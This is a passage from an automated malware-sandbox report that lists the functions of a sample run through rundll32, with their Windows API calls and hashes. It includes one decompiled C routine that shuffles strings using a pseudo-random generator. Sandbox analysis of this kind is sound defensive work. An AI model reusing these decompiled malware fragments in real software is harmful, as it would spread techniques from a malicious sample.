                                                          • Instruction ID: a8018d0cb8d6a8a1b7fa8bd76718c4ba9eaa327791e6141fc2a1c9e85400aeb3
                                                          • Opcode Fuzzy Hash: da5ee6887bc530691db436172c095fe345b900475db24cf4db21ec42261584d8
                                                          • Instruction Fuzzy Hash: B5516D71904208FFEF10DFE9DC88AAEBBB9FB44350F048826F901E6190D7399A54DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055878D7, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(?,00000020), ref: 055879D4
                                                          • lstrcat.KERNEL32(?,00000020), ref: 055879E9
                                                          • lstrcmp.KERNEL32(00000000,?), ref: 05587A00
                                                          • lstrlen.KERNEL32(?,?,BD092303,00000000,69B25F44), ref: 05587A24
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 961acca12e5ed05e8bc21b20bbe853511b401030bd8456342a62fe196070878a
                                                          • Instruction ID: 57cda0cc97110b63a700d7d207b41888cf05086a01813aa1e4b7d84842515f9a
                                                          • Opcode Fuzzy Hash: 961acca12e5ed05e8bc21b20bbe853511b401030bd8456342a62fe196070878a
                                                          • Instruction Fuzzy Hash: CE51B831A14118EFDF21EF99C4846BDBBB6FF49310F258096E825BB211C732AA55DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E52D0E, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E00E52D0E(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00E55FBC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00E513CC(_v16);
								goto L37;
							}
							_t103 = E00E55FBC((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xe5a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x00e52d15
                                                          0x00e52d1c
                                                          0x00e52d21
                                                          0x00e52d24
                                                          0x00e52d2b
                                                          0x00e52d2e
                                                          0x00e52d31
                                                          0x00e52d38
                                                          0x00e52d3b
                                                          0x00e52e8f
                                                          0x00e52e91
                                                          0x00e52e93
                                                          0x00e52e98
                                                          0x00e52e98
                                                          0x00e52d41
                                                          0x00e52d44
                                                          0x00e52d47
                                                          0x00e52d49
                                                          0x00e52d49
                                                          0x00e52d4d
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52d51
                                                          0x00e52d7d
                                                          0x00e52d82
                                                          0x00e52d84
                                                          0x00e52d84
                                                          0x00e52d87
                                                          0x00e52d8a
                                                          0x00e52d8a
                                                          0x00e52d8c
                                                          0x00000000
                                                          0x00e52d57
                                                          0x00e52d59
                                                          0x00e52d78
                                                          0x00e52d78
                                                          0x00e52d8f
                                                          0x00e52d8f
                                                          0x00e52d90
                                                          0x00e52d90
                                                          0x00e52d93
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52d93
                                                          0x00e52d5d
                                                          0x00e52da4
                                                          0x00e52da8
                                                          0x00e52e82
                                                          0x00e52e84
                                                          0x00e52e84
                                                          0x00e52e85
                                                          0x00e52e88
                                                          0x00000000
                                                          0x00e52e88
                                                          0x00e52dc2
                                                          0x00e52dc6
                                                          0x00e52e7e
                                                          0x00000000
                                                          0x00e52e7e
                                                          0x00e52dcc
                                                          0x00e52dcf
                                                          0x00e52dd3
                                                          0x00e52dd9
                                                          0x00e52ddc
                                                          0x00e52e74
                                                          0x00e52e74
                                                          0x00000000
                                                          0x00e52e7a
                                                          0x00e52de7
                                                          0x00e52df0
                                                          0x00e52e04
                                                          0x00e52e0b
                                                          0x00e52e20
                                                          0x00e52e26
                                                          0x00e52e2e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52e30
                                                          0x00e52e30
                                                          0x00e52e30
                                                          0x00e52e37
                                                          0x00e52e3f
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52e41
                                                          0x00e52e4a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52e4c
                                                          0x00e52e4e
                                                          0x00e52e51
                                                          0x00e52e51
                                                          0x00e52e54
                                                          0x00e52e58
                                                          0x00e52e5b
                                                          0x00e52e61
                                                          0x00e52e64
                                                          0x00e52e6b
                                                          0x00000000
                                                          0x00e52de7
                                                          0x00e52d62
                                                          0x00e52d6d
                                                          0x00e52d70
                                                          0x00e52d72
                                                          0x00e52d72
                                                          0x00e52d75
                                                          0x00e52d77
                                                          0x00000000
                                                          0x00e52d77
                                                          0x00e52d51
                                                          0x00e52d97
                                                          0x00e52d9c
                                                          0x00e52d9e
                                                          0x00e52d9e
                                                          0x00e52da1
                                                          0x00e52da1
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00E52E0B
                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 00E52E20
                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00E52E37
                                                          • lstrlen.KERNEL32(69B25F45), ref: 00E52E5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID: KE
                                                          • API String ID: 3214092121-838392977
                                                          • Opcode ID: 8ba4948bf58993e186e6cbba77884982eba5a1ba1794d87d7325bddd8de9323a
                                                          • Instruction ID: b55f4c7aca40041fb7e7028c8bcf18df8d87594c9db3c4663eee7810cfae632f
                                                          • Opcode Fuzzy Hash: 8ba4948bf58993e186e6cbba77884982eba5a1ba1794d87d7325bddd8de9323a
                                                          • Instruction Fuzzy Hash: 2251C431A00208EFDF15DF99C885AEDBBB5FF4631AF14985AED15BB211C7309A49CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055914D7, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(755506E0,00000000,00000000,755506E0,00000020,80000001,055914F6,?,80000001), ref: 0557E53D
                                                            • Part of subcall function 0557E52C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0557E55A
                                                          • lstrlenW.KERNEL32(00000000,00000000,755506E0,00000020,?,80000001), ref: 0559151D
                                                          • lstrlenW.KERNEL32(00000008), ref: 05591524
                                                          • lstrlenW.KERNEL32(?,?), ref: 05591540
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 055915BA
                                                          • lstrlenW.KERNEL32(?), ref: 055915C6
                                                          • wsprintfA.USER32 ref: 055915F4
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                          • String ID:
                                                          • API String ID: 3384896299-0
                                                          • Opcode ID: 687d45e7ca57e9240ae5b53a39bdc95b44962bd8e696d1ad05de2679aa0f0c96
                                                          • Instruction ID: 72d7f1d8388a60a40818db41cfbcb59ffefb661d348adf33c2f67f0170b8f1cf
                                                          • Opcode Fuzzy Hash: 687d45e7ca57e9240ae5b53a39bdc95b44962bd8e696d1ad05de2679aa0f0c96
                                                          • Instruction Fuzzy Hash: D5415971A0020AAFCF11AFA9DD45DAE7BBDFF84204B054456F905E7211EB39DA14EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055759DA, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 055759FC
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A0D
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A1F
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A31
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A43
                                                          • lstrlenW.KERNEL32(?,00000000,0559B000,05594ADE), ref: 05575A4F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: 157ae8ca5dcdb30216d8882b2b12186043ef8ebf79fe2e44f48ef0c8e762835f
                                                          • Instruction ID: f70ba2b3cd499a5f2370e898ec3c6cd32f8f81e6faf2bfcc84735c435e28da7e
                                                          • Opcode Fuzzy Hash: 157ae8ca5dcdb30216d8882b2b12186043ef8ebf79fe2e44f48ef0c8e762835f
                                                          • Instruction Fuzzy Hash: FC411C71E0060DAFCB24DFA9D8C0A6EB7FABF88205B14883DE516E3600E774E9458B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0559209C, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558EC07: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0558EC13
                                                            • Part of subcall function 0558EC07: SetLastError.KERNEL32(000000B7,?,055920B0,?,?,00000000,?,?,?), ref: 0558EC24
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 055920D0
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 055921A8
                                                            • Part of subcall function 05581DB7: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05581DD1
                                                            • Part of subcall function 05581DB7: CreateWaitableTimerA.KERNEL32(0559C1A8,00000001,?), ref: 05581DEE
                                                            • Part of subcall function 05581DB7: GetLastError.KERNEL32(?,00000000,05587801,00000000,00000000,00008008,?,?,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05581DFF
                                                            • Part of subcall function 05581DB7: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E3F
                                                            • Part of subcall function 05581DB7: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E5E
                                                            • Part of subcall function 05581DB7: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05587801,00000000,00000000,00008008), ref: 05581E74
                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 05592191
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0559219A
                                                            • Part of subcall function 0558EC07: CreateMutexA.KERNEL32(0559C1A8,00000000,?,?,055920B0,?,?,00000000,?,?,?), ref: 0558EC37
                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 055921B5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                                          • String ID:
                                                          • API String ID: 1700416623-0
                                                          • Opcode ID: 4dcdbfc2e326b55f9c75ac395d7af829eb6abbb3dff378b441e9ecad8a356dcc
                                                          • Instruction ID: f74d699199a677b235108af52feb4ad7ed0a272df137ac868d8d07ff14bbcb2f
                                                          • Opcode Fuzzy Hash: 4dcdbfc2e326b55f9c75ac395d7af829eb6abbb3dff378b441e9ecad8a356dcc
                                                          • Instruction Fuzzy Hash: 1E31E178B10204ABCF18AF64E8858BE7FBAFB88344B110527F802D7250DB389815EF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558BAA0, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 0558BAB9
                                                            • Part of subcall function 05592015: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05577083), ref: 0559203B
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 0558BAFB
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 0558BB4D
                                                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 0558BB66
                                                            • Part of subcall function 05580373: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05580394
                                                            • Part of subcall function 05580373: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 055803D7
                                                          • GetLastError.KERNEL32 ref: 0558BB9E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                                          • String ID:
                                                          • API String ID: 1921436656-0
                                                          • Opcode ID: 0230434a8b4072e721ad20fec1509c40f3317fecad0e655ff172ac5cb65fd35e
                                                          • Instruction ID: be46bfe42437e8605613efe2cc513dd9850d1863dcf741c253bf12b260b9268d
                                                          • Opcode Fuzzy Hash: 0230434a8b4072e721ad20fec1509c40f3317fecad0e655ff172ac5cb65fd35e
                                                          • Instruction Fuzzy Hash: 91318D71A00209EFEF11EF65D885EBE7BB9FB04361F058066E905E7244DB74AA44DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05588616, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 05588698
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 055886B1
                                                          • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 055886BE
                                                          • lstrlen.KERNEL32(0559D3A4,?,?,?,?,?,00000000,00000000,?), ref: 055886D0
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000000,?), ref: 05588701
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                                          • String ID:
                                                          • API String ID: 2734445380-0
                                                          • Opcode ID: 4332d292ccd4118ac25c0ed0155fa54880b2a49414f86afa247955cdb32a8f5b
                                                          • Instruction ID: eecc12f7e399696394dc8870fded5156760a025a8db4893c63e0876f777d5060
                                                          • Opcode Fuzzy Hash: 4332d292ccd4118ac25c0ed0155fa54880b2a49414f86afa247955cdb32a8f5b
                                                          • Instruction Fuzzy Hash: 35317C76A00209EFDB11EF95DC89EEE7FB9FF44350F104525F915A6200EB39A918DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05576BB2, Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05584045: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0558404D
                                                            • Part of subcall function 05584045: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05584062
                                                            • Part of subcall function 05584045: InterlockedIncrement.KERNEL32(0000001C), ref: 0558407B
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05576BE9
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05576BFA
                                                          • lstrcmpi.KERNEL32(00000002,?), ref: 05576C40
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05576C54
                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 05576C9A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 733514052-0
                                                          • Opcode ID: e548ae00febad829c1ac3cba03abcb536a079f1f4863f0ea3f289fc6d2f88820
                                                          • Instruction ID: 6643b9080bbaf44d5110f3152a1d538fac3d669357f89b75b892d2b66e559804
                                                          • Opcode Fuzzy Hash: e548ae00febad829c1ac3cba03abcb536a079f1f4863f0ea3f289fc6d2f88820
                                                          • Instruction Fuzzy Hash: 6F31A772A10619AFDF11DFA4EC85EAE7BBDFB04254F154025F905A7200DB399D48DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05573F6A, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05586FEB: lstrlen.KERNEL32(?,00000000,?,00000000,05592373,?,?,00000000,?,05582161,?,?,?,?), ref: 05586FF7
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 05573F94
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05573FA7
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05573FB8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 05574023
                                                          • InterlockedIncrement.KERNEL32(0559C33C), ref: 0557403A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 3915436794-0
                                                          • Opcode ID: 972ebf1e7946b225c72e30d67529c1fd3681574f5255c7e3666e30af1db0b7eb
                                                          • Instruction ID: 1a91dc48a354143d90fe3377eea8ca7f4000ba8ecbcaf547bf53dadb76ba05f6
                                                          • Opcode Fuzzy Hash: 972ebf1e7946b225c72e30d67529c1fd3681574f5255c7e3666e30af1db0b7eb
                                                          • Instruction Fuzzy Hash: B331813261470ADFCB21CF58E84592ABFF5FB45361F42491EF8A687250CB38E819DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558D855, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,7519F560,00000000,00000000,0558D369,00000000,00000000), ref: 0558D875
                                                          • LoadLibraryA.KERNEL32(?), ref: 0558D88A
                                                          • LoadLibraryA.KERNEL32(?), ref: 0558D8A6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558D8BB
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0558D8CF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AddressProc
                                                          • String ID:
                                                          • API String ID: 1469910268-0
                                                          • Opcode ID: d32d4d1ad7bcffaae17564e06fbc4d4a633bd699995ea0afc8307d92899b6efe
                                                          • Instruction ID: 47c4c25fa596fd5b363ad633a2d0a34c00f9ddb5d1198e58c6f7bdc0c563bb0f
                                                          • Opcode Fuzzy Hash: d32d4d1ad7bcffaae17564e06fbc4d4a633bd699995ea0afc8307d92899b6efe
                                                          • Instruction Fuzzy Hash: 913180726202019FDB00DB99E886EA57BF9FB4D724B06415BF509EB350DB3CAC09AF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05577886, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 055778A9
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 055778B2
                                                          • GetLastError.KERNEL32 ref: 055778BC
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0557797B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3543646443-0
                                                          • Opcode ID: ffb73938a8833fcff0a5a52af563cf067baa089da21bbb396edfa0a8bd7f70e6
                                                          • Instruction ID: 23d87d5c2f0ecaba89605712901347ad2d45137b4f9ae6f4ce57595dfd43be73
                                                          • Opcode Fuzzy Hash: ffb73938a8833fcff0a5a52af563cf067baa089da21bbb396edfa0a8bd7f70e6
                                                          • Instruction Fuzzy Hash: 21214776625119ABC610F7E6FC9ED867BADFF86210F060552B605C7140DA2CA50CD7A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05573B9D, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0557D520: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0557D52C
                                                            • Part of subcall function 0557D520: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0557D542
                                                            • Part of subcall function 0557D520: _snwprintf.NTDLL ref: 0557D567
                                                            • Part of subcall function 0557D520: CreateFileMappingW.KERNEL32(000000FF,0559C1A8,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0557D583
                                                            • Part of subcall function 0557D520: GetLastError.KERNEL32 ref: 0557D595
                                                            • Part of subcall function 0557D520: CloseHandle.KERNEL32(00000000), ref: 0557D5CD
                                                          • UnmapViewOfFile.KERNEL32(?,?,?), ref: 05573BD8
                                                          • CloseHandle.KERNEL32(?), ref: 05573BE1
                                                          • SetEvent.KERNEL32(?,?,?), ref: 05573C28
                                                          • GetLastError.KERNEL32(0557D203,00000000,00000000), ref: 05573C57
                                                          • CloseHandle.KERNEL32(00000000,0557D203,00000000,00000000), ref: 05573C67
                                                            • Part of subcall function 0557B585: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05579C46,?), ref: 0557B591
                                                            • Part of subcall function 0557B585: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05579C46,?), ref: 0557B5B9
                                                            • Part of subcall function 0557B585: memset.NTDLL ref: 0557B5CB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1106445334-0
                                                          • Opcode ID: e2adc35898979139763d7f73747da9189576db2028200fc089a6ffa9a78626ea
                                                          • Instruction ID: cf664026b21609aefd48c6cfc959311b7c200487b3ab2e3e38cdc8c70c23cf3c
                                                          • Opcode Fuzzy Hash: e2adc35898979139763d7f73747da9189576db2028200fc089a6ffa9a78626ea
                                                          • Instruction Fuzzy Hash: D7219271614209AFDB50AFB4ED45A6A7BECBF44720F120866F546E3150EF35FD04AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05580538, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0558820A,00000000,?,?), ref: 05580556
